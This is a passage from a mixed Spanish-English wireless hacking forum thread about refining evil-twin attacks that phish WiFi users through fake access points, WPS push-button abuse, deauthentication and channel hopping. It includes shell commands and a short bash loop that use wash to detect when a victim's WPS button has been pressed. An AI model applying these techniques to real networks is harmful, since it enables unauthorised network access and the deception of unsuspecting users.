That most one i like of them is the WIFI Manager phishing page
where we create a wifi manager captive portal
Based on the user agent of the connected device
This way they get fooled and think that they are still in the password entering place , Even that they are in the captive portal
ex. for Samsung

Wifiphsiher already has a one for windows
68747470733a2f2f77696669706869736865722e6769746875622e696f2f77696669706869736865722f73732d7765627068697368696e672e706e67

And another for Ios

And another of Mac OS

But non for android !

That would have been useful before 2018 before android and IOS added MAC Address Randomization by default and windows too ... now it's pretty useless so....

This problem could be fixed if you were able to apply

Some of these anti mac address Randomization methods

But it's too complicated

https://petsymposium.org/2021/files/pap … 1-0042.pdf

kcdtv · 28-01-2022 14:57:50

Oh boy ! looks like i missed a lot haha

big_smile
Reaver también se basa en wpa_supplicant, Craig heffner (creador de las primeras versiones) ha modificado algunas librerías para que se adapte mejor al prometido de la herramienta.

Sobre los saltos de canales, puedes probar fijar el canal de tu interfaz con iw, por ejemplo:

sudo iw dev wlan0 set channel 6

O bien puedes editar tu fichero de configuración wpa_supplicant especificando un canal.

also is there way to do wpa_cli wps_pbc in monitor mode ?

Es posible pero no tengo idea de cómo hacerlo concretamente. tongue
Puedes hacer como ha hecho craig heffner con el modo PIN: Modificar wpa_supplicant en modo PBC.
Necesitas un buen nivel en C y un buen conocimiento de los sistemas linux.
O bien escribir tu herramienta "from the scratch" con scapy en Python.

I am currently looking for a way to pull Evil twin with channel hopping + PBC Using only a Single adapter

No es posible con un solo adaptador porque las interfaces virtuales están atadas a la interfaz física.
Para tener una interfaz en un canal fijo y otra haciendo channel hooping necesitas sí o sí dos adaptadores WiFi.

Also how does wpa_cli wps_pbc work ? does it work the same way as
timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed
or ... ?

Esto está explicado en los temas que te he puesto en link wink
El "truco" es usar el modo "--debugg" con "full verbose" de wpa_supplicant.
Así tienes a todo lo que pasa en consola, y puedes hacer un "grep" con un pipe para depurar.
Dicho esto mejor hacer lo con wash que está mucho más adaptado ya que diseñado para escaneo wps.

I suggested to rofl0r to add it to Reaver issue num 107 before i opened that issue Wash wasn't able to detect if the button has been pushed or not.They just added showing wps_device_password_id in the Json mode of wash

¡Bien Hecho!

wifiyeah · 28-01-2022 16:37:24

Reaver issue num 107??

eso es un poco antiguo no?
creo que va por la 700
se supone que ahora detecta eso no?

tambien he probado el comando

wash -i mon0 -b xxxxxxxxxx -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

y no pasa nada de nada,
ademas -j como lo puso mooooon no sirve da error,
y el timeout para que??

salu2

mooooon · 28-01-2022 18:19:33

kcdtv escribió:

Reaver también se basa en wpa_supplicant, Craig heffner (creador de las primeras versiones) ha modificado algunas librerías para que se adapte mejor al prometido de la herramienta.

Oh even Reaver that works in monitor mode is based on wpa_supplicant !! That's just insane

No es posible con un solo adaptador porque las interfaces virtuales están atadas a la interfaz física.
Para tener una interfaz en un canal fijo y otra haciendo channel hooping necesitas sí o sí dos adaptadores WiFi.

I meant using some method like monitoring for channel change using airdoump-ng -c option
and kill everything incase of the AP not found on current channel to grab the new channel then Restart

But someone told me that they tried it and airodump just messes things up and that's inconstant

Also what do you think about this ?

[url=https://rhaidiz.net/2018/10/25/dribble-stealing-wifi-password-via-browsers-cache-poisoning/]Hacking Wi-Fi with cached JavaScript Via Browsers Cache Poisoning
[/url]

Are you interested in doing something like it but with captive portal instead ?

Getting the model is easy with 3wifi and fing and wps

¡Bien Hecho!

Thanks for Your help so far

mooooon · 28-01-2022 18:24:15

wifiyeah escribió:

Reaver issue num 107??
eso es un poco antiguo no?
creo que va por la 700
se supone que ahora detecta eso no?
tambien he probado el comando
wash -i mon0 -b xxxxxxxxxx -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed
y no pasa nada de nada,
ademas -j como lo puso mooooon no sirve da error,
y el timeout para que??
salu2

First you forgot the -j option !!
And you forgot to change the channel number !!
it should be like this

wash -j -i mon0 -b xxxxxxxxxx -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

Second Update Reaver to the latest Version first !

creo que va por la 700

That's because you are discussing the issue on Pixiewps

the timeout option is Cause wash would never exit if you don't kill it , Which means that grep would never Echo anything !

You can do it using a .sh file if you want

#!/bin/bash
wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8   > file.txt &
PIDOFWASH=$!
until grep -q '"wps_device_password_id" : "0004"' file.txt;
do
sleep 1;
done;
echo found
kill ${PIDOFWASH}

Ultima edición por mooooon (28-01-2022 18:25:19)

Koala · 29-01-2022 17:34:36

Hi cool

1. So.... IF the network is 2.4GHz only ... Can The hostbase wps phishing attack can be done with one adapter + channel hopping ?
2. Why ? Every single Evil twin tool/script out there launches the fake AP on the same channel as the real AP with no problem what so ever
Check Airegddon/Fluxion/Wifiphisher
3. How wash is better ? And i didn't say shutdown but restart .... when they restart their AP they expect the network to disappear from the networks list for a while then appear again ... but whenn
they see that the network is still there , they will know that something is wrong and the wifi isn't coming from their Router!

For 1: no it can't works with one adapter only, i always use 2 (or 3 for 5GHz frequeny).

For2: I don't know how work airgeddon Fluxion Wifiphisher cause i only use my tool.They can do the same AP on the same canal maybe because they don't use the same mdk3/4 options like hostbase, like i said i don't know very well the others tools.I use the option -c wich mean this strongly affect the networks on the same channel, for this reason i recommand to set up the AP on other channel when launching the fake AP (3 or 9 are good beacause few poeple on it).Using the -c option from mdk3 this is possible to attack 2 networks at the same time, i maked a vidéo on youtube to show that but they deleted my vidéo for "no respect the rules of the comunity".... hmm youtube is a joke.... pam

For 3: I switched from airodump to wash because sometimes when fixing airodump with one channe if there are a lot of networks around, the adapter can block to a channel and make a false positive when the real AP is doing channel hopping.Like you said before, you tried the wifislax version and channel hopping was not working fine.Since i use wash to check the channel of the AP it work fine.Now include a restart of the fake AP when the real AP is shutdown is a good idea.In my personal experience i have not encountered this problem at his time.In the last version i included a timeout of 10 minutes if the wps push boton has not been activaded befor restart the attack.

I work on a new version of hostbase but i can't say now when i will release it.Like i see the wps_pbc attack is becoming attractive, the first time i did this attack was in 2015 and i will continue until wps will exist and i hope it will exist for long time lol

Ultima edición por Koala (29-01-2022 18:38:55)

Koala · 04-02-2022 17:50:14

Hi cool

So i have a good news, apparently it is possible to stop the deauth only when the wps button has been pushed.Before i was close the deauth only when a victim joined the fake AP to let the router waking up to be sure we can launch the wps_pbc request efficiently after that.Now from what i have tested on my router, it seem to be possible to stop the deauth only when the wps button has been pushed.I maked a sample ruby script to test this new option using a loop with wash.

wpspbc

But i did a quick test, it is completely experimental i have to do a stress test on my router deauthing it for a while and let him doing channel hopping to see if that work or not.

If it works i will have to include this option on the next release of hostbase (the most difficult is when you have to debug a progam...)

Like you can see, i consider any of you proposal to make better the hostbase project and i hope you will enjoy the next version if i can include this new test in the whole script smile

@++

Ultima edición por Koala (04-02-2022 17:53:58)

mooooon · 16-02-2022 21:18:53

Koala escribió:

Hi
I work on a new version of hostbase but i can't say now when i will release it.Like i see the wps_pbc attack is becoming attractive, the first time i did this attack was in 2015 and i will continue until wps will exist and i hope it will exist for long time

haha yeah big_smile :D

mooooon · 16-02-2022 21:24:48

Koala escribió:

Hi

So i have a good news, apparently it is possible to stop the deauth only when the wps button has been pushed.Before i was close the deauth only when a victim joined the fake AP to let the router waking up to be sure we can launch the wps_pbc request efficiently after that.Now from what i have tested on my router, it seem to be possible to stop the deauth only when the wps button has been pushed.I maked a sample ruby script to test this new option using a loop with wash.

https://zupimages.net/up/22/05/d665.png

Whoa that's hella Great ! yikes

Like you can see, i consider any of you proposal to make better the hostbase project and i hope you will enjoy the next version if i can include this new test in the whole script
@++

sure : )

Tema	Respuestas	Vistas	Ultimo mensaje
WPA2: roto con KRACK. ¿Ahora que? por Virkon [ 1 2 ]	26	7781	15-03-2023 16:57:32 por kcdtv
Pegado: Pegado:: AWITAS. Ataque a WPS con rogueAP potegido con WPA por javierbu [ 1 2 ]	34	3814	12-03-2023 18:24:22 por Guybrush92
Pegado: Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r [ 1 2 3 … 18 ]	436	63615	07-03-2023 12:35:27 por kcdtv
iwd;¿El demonio WiFi Linux qué lo cambiara todo? por kcdtv	0	423	23-02-2023 17:09:39 por kcdtv
Pegado: Pegado:: Base de datos WPSPIN (original) open source actualizada por kcdtv [ 1 2 3 4 5 ]	114	258659	19-02-2023 17:36:14 por chuchof

Foro Wifi-libre.com

Anuncio

#1 22-01-2022 02:31:26